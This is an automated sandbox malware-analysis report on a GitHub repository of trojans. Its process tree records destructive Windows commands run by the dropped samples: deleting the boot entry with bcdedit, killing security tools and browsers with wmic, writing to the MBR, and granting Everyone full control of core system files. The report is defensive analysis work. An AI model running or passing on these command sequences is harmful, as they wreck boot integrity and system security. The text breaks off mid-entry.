hxxps://github[.]com/pankoza2-pl/trojan-leaks

Analysis

max time kernel
1450s
max time network
1364s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
30/05/2024, 12:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/pankoza2-pl/trojan-leaks

Score

8^/10

bootkit discovery exploit persistence

Malware Config

Signatures

Downloads MZ/PE file

Possible privilege escalation attempt 25 IoCs

exploit

pid	Process
4612	takeown.exe
3116	icacls.exe
2084	icacls.exe
1476	icacls.exe
1316	icacls.exe
3600	takeown.exe
1208	takeown.exe
696	icacls.exe
4108	takeown.exe
2352	takeown.exe
2372	takeown.exe
4996	takeown.exe
4664	icacls.exe
1976	takeown.exe
872	takeown.exe
1900	icacls.exe
1256	icacls.exe
4396	icacls.exe
372	takeown.exe
3916	takeown.exe
1728	takeown.exe
704	icacls.exe
640	icacls.exe
4484	icacls.exe
484	takeown.exe

Executes dropped EXE 3 IoCs

pid	Process
1664	0x07.exe
1012	winconfig.exe
3232	DetectKey.exe

Modifies file permissions 1 TTPs 25 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4108	takeown.exe
1208	takeown.exe
3916	takeown.exe
704	icacls.exe
640	icacls.exe
696	icacls.exe
484	takeown.exe
4396	icacls.exe
872	takeown.exe
2352	takeown.exe
3116	icacls.exe
4664	icacls.exe
4996	takeown.exe
372	takeown.exe
3600	takeown.exe
1476	icacls.exe
1316	icacls.exe
1256	icacls.exe
4612	takeown.exe
1728	takeown.exe
2084	icacls.exe
1900	icacls.exe
4484	icacls.exe
1976	takeown.exe
2372	takeown.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
78	raw.githubusercontent.com
76	raw.githubusercontent.com
77	raw.githubusercontent.com

Modifies boot configuration data using bcdedit 1 IoCs

pid	Process
3632	bcdedit.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	0x07.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133615500475115657"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5060	chrome.exe
5060	chrome.exe
2324	chrome.exe
2324	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1664	0x07.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
5060	chrome.exe
5060	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe
Token: SeShutdownPrivilege	5060	chrome.exe
Token: SeCreatePagefilePrivilege	5060	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe
5060	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1664	0x07.exe
1012	winconfig.exe
3232	DetectKey.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5060 wrote to memory of 1772	5060	chrome.exe	72
PID 5060 wrote to memory of 1772	5060	chrome.exe	72
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 1308	5060	chrome.exe	74
PID 5060 wrote to memory of 5028	5060	chrome.exe	75
PID 5060 wrote to memory of 5028	5060	chrome.exe	75
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76
PID 5060 wrote to memory of 2688	5060	chrome.exe	76

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/pankoza2-pl/trojan-leaks
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffe349d9758,0x7ffe349d9768,0x7ffe349d9778
  2⤵
  PID:1772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:2
  2⤵
  PID:1308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  2⤵
  PID:5028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2040 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  2⤵
  PID:2688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2832 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2840 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:1
  2⤵
  PID:3384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  2⤵
  PID:1784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2976 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  2⤵
  PID:792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4784 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  2⤵
  PID:2228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4876 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  2⤵
  PID:368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1664 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  2⤵
  PID:4396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5232 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  2⤵
  PID:1476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4872 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  2⤵
  PID:4624
- C:\Users\Admin\Downloads\0x07.exe
  "C:\Users\Admin\Downloads\0x07.exe"
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1664
- - C:\Windows\Temp\winconfig.exe
    "C:\Windows\Temp\winconfig.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1012
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2B40.tmp\2B41.tmp\2B42.bat C:\Windows\Temp\winconfig.exe"
      4⤵
      PID:2100
    - - C:\Users\Admin\AppData\Roaming\DetectKey.exe
        
        "C:\Users\Admin\AppData\Roaming\DetectKey.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3232
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3632
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='taskmgr.exe' delete /nointeractive
        5⤵
        
        PID:3156
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='perfmon.exe' delete /nointeractive
        5⤵
        
        PID:4352
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='mmc.exe' delete /nointeractive
        5⤵
        
        PID:4232
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='PartAssist.exe' delete /nointeractive
        5⤵
        
        PID:3064
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='control.exe' delete /nointeractive
        5⤵
        
        PID:4832
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='ProcessHacker.exe' delete /nointeractive
        5⤵
        
        PID:2992
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='Security Task Manager.exe' delete /nointeractive
        5⤵
        
        PID:2512
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='Security Task Manager Protable.exe' delete /nointeractive
        5⤵
        
        PID:2212
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='CCleaner.exe' delete /nointeractive
        5⤵
        
        PID:4948
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='procexp.exe' delete /nointeractive
        5⤵
        
        PID:2648
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='procexp64.exe' delete /nointeractive
        5⤵
        
        PID:4180
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='procexp64a.exe' delete /nointeractive
        5⤵
        
        PID:3932
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='logonui.exe' delete /nointeractive
        5⤵
        
        PID:4652
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='regedit.exe' delete /nointeractive
        5⤵
        
        PID:1804
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='iexplore.exe' delete /nointeractive
        5⤵
        
        PID:1016
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='chrome.exe' delete /nointeractive
        5⤵
        
        PID:604
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='firefox.exe' delete /nointeractive
        5⤵
        
        PID:1568
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='opera.exe' delete /nointeractive
        5⤵
        
        PID:2960
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='edge.exe' delete /nointeractive
        5⤵
        
        PID:1264
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='msedge.exe' delete /nointeractive
        5⤵
        
        PID:1660
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='brave.exe' delete /nointeractive
        5⤵
        
        PID:4296
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='wmplayer.exe' delete /nointeractive
        5⤵
        
        PID:1988
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='notepad.exe' delete /nointeractive
        5⤵
        
        PID:2300
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='notepad++.exe' delete /nointeractive
        5⤵
        
        PID:2076
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='taskmgr.exe' delete /nointeractive
        5⤵
        
        PID:3476
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='perfmon.exe' delete /nointeractive
        5⤵
        
        PID:3712
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='logonui.exe' delete /nointeractive
        5⤵
        
        PID:3580
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='ProcessHacker.exe' delete /nointeractive
        5⤵
        
        PID:4428
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\taskmgr.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:872
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\hal.dll"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4612
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4108
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\ntoskrnl.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1208
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\perfmon.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:484
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\resmon.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2352
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\logonui.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1728
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\taskkill.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1976
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\tasklist.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3916
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\tskill.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4996
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\system32\logonui.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2372
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Program Files\Process Hacker 2"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:372
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3600
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='taskmgr.exe' delete /nointeractive
        5⤵
        
        PID:2128
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='perfmon.exe' delete /nointeractive
        5⤵
        
        PID:1484
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='logonui.exe' delete /nointeractive
        5⤵
        
        PID:2228
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='ProcessHacker.exe' delete /nointeractive
        5⤵
        
        PID:4860
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3116
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\system32\hal.dll" /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2084
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\system32\winload.exe" /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4664
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1900
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:704
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1256
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:640
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1476
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4396
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4484
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:696
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1316
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='taskmgr.exe' delete /nointeractive
        5⤵
        
        PID:2976
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='perfmon.exe' delete /nointeractive
        5⤵
        
        PID:3908
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='logonui.exe' delete /nointeractive
        5⤵
        
        PID:2364
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='ProcessHacker.exe' delete /nointeractive
        5⤵
        
        PID:1020
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:984
    - - C:\Windows\system32\cacls.exe
        
